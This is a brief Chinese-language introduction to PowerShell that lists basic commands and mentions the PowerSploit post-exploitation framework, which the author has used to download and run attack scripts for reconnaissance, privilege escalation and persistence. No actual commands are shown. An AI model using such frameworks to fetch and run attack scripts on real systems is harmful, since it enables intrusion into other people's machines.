PowerShell 是一种命令行外壳程序和脚本环境，主要用于Windows计算机方便管理员进行系统管理并有可能在未来取代Windows上的默认命令提示符。PowerShell脚本因其良好的功能特性常用于正常的系统管理和安全配置工作。

使用

常见的操作 pwd ls cd mkdir rm get-process获取所有进程信息 get-date获取当前时间信息 get-host获取当前主机信息 然后就是使用PowersSploit(基于Powershell的后渗透框架软件，包括了很多Power shell攻击脚本，主要用于渗透中的信息收集，权限提升，权限维持)的时候在Powshell上使用过一些下载和运行攻击脚本的命令。